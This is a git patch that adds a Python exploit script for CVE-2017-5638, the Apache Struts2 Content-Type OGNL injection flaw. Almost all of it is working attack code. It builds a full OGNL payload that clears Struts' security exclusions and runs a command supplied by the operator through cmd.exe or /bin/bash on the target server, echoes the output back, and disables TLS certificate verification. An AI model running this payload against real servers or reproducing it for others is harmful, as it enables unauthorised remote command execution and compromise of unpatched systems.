From 8255810ba2a3aa41774253ff005a9c5f4f6f4e56 Mon Sep 17 00:00:00 2001 From: joker2a Date: Wed, 10 Mar 2021 11:51:52 +0100 Subject: [PATCH] Create exploit-pycurl-no-ssl-certificate.py Ignore SSL Certificate mod Version --- .../exploit-pycurl-no-ssl-certificate.py | 60 +++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 CVE-2017-5638/exploit-pycurl-no-ssl-certificate.py diff --git a/CVE-2017-5638/exploit-pycurl-no-ssl-certificate.py b/CVE-2017-5638/exploit-pycurl-no-ssl-certificate.py new file mode 100644 index 0000000..e4a717e --- /dev/null +++ b/CVE-2017-5638/exploit-pycurl-no-ssl-certificate.py @@ -0,0 +1,60 @@ +!/usr/bin/python +# -*- coding: utf-8 -*- + +# From https://github.com/rapid7/metasploit-framework/issues/8064 +# Mod version by Lotolo and Joker2a +# IGNORE SSL Certificate Version + +import urllib2 +import httplib +import ssl + + +def exploit(url, cmd): + payload = "%{(#_='multipart/form-data')." + payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + payload += "(#_memberAccess?" + payload += "(#_memberAccess=#dm):" + payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + payload += "(#ognlUtil.getExcludedPackageNames().clear())." + payload += "(#ognlUtil.getExcludedClasses().clear())." + payload += "(#context.setMemberAccess(#dm))))." + payload += "(#cmd='%s')." % cmd + payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." + payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." + payload += "(#p=new java.lang.ProcessBuilder(#cmds))." + payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." + payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." + payload += "(#ros.flush())}" + + try: + ctx = ssl.create_default_context() + ctx.set_ciphers('HIGH:!DH:!aNULL') + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + + headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} + request = urllib2.Request(url, headers=headers) + +# page = urllib2.urlopen(url=request, context=ssl._create_unverified_context()).read() + page = urllib2.urlopen(url=request,context=ctx).read() + except httplib.IncompleteRead, e: + page = e.partial + + print(page) + return page + + +if __name__ == '__main__': + import sys + if len(sys.argv) != 3: + print("[*] struts2-rce.py ") + else: + print('[*] CVE: 2017-5638 - Apache Struts2 S2-045 an') + print('[*] CVE: 2016-3087 - Apache Struts2 S2-032 an') + url = sys.argv[1] + cmd = sys.argv[2] + print("%s : [*] cmd: %s\n" % (url, cmd)) + exploit(url, cmd)